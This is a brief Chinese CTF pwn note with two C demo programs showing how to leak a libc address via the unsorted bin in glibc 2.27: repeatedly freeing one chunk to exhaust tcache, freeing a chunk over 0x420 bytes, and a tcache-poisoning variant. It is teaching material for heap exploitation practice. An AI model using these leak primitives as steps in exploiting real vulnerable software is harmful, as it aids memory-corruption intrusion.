CTF-Pwn-2.27版本unsorted_bin_libc_leak若干方法
1、存在UAF漏洞,直接多次free,从而达到libc leak
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| #include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
int main(){
setbuf(stdin,0);
setbuf(stdout,0);
setbuf(stderr,0);
int i = 0;
unsigned long * ptr = malloc(0x91);
malloc(0x18);
for(i = 0;i<7;i++)
free(ptr);
free(ptr);
printf("pid = %d\n",getpid());
printf("fd = %p\n",ptr[0]);
getchar();
return 0;
}
|
2、free一个大堆块(大于0x420的堆块)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| #include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
int main(){
setbuf(stdin,0);
setbuf(stdout,0);
printf("pid = %d\n",getpid());
long long * ptr = malloc(0x420);
malloc(0x20);
printf("tcache address:%p\n",(long long)ptr);
free(ptr);
getchar();
return 0;
}
|
[变式]3、若存在UAF和double free,可以使用tcache攻击修改可控制堆块的size,然后free8次被修改size的堆块,即可libc leak
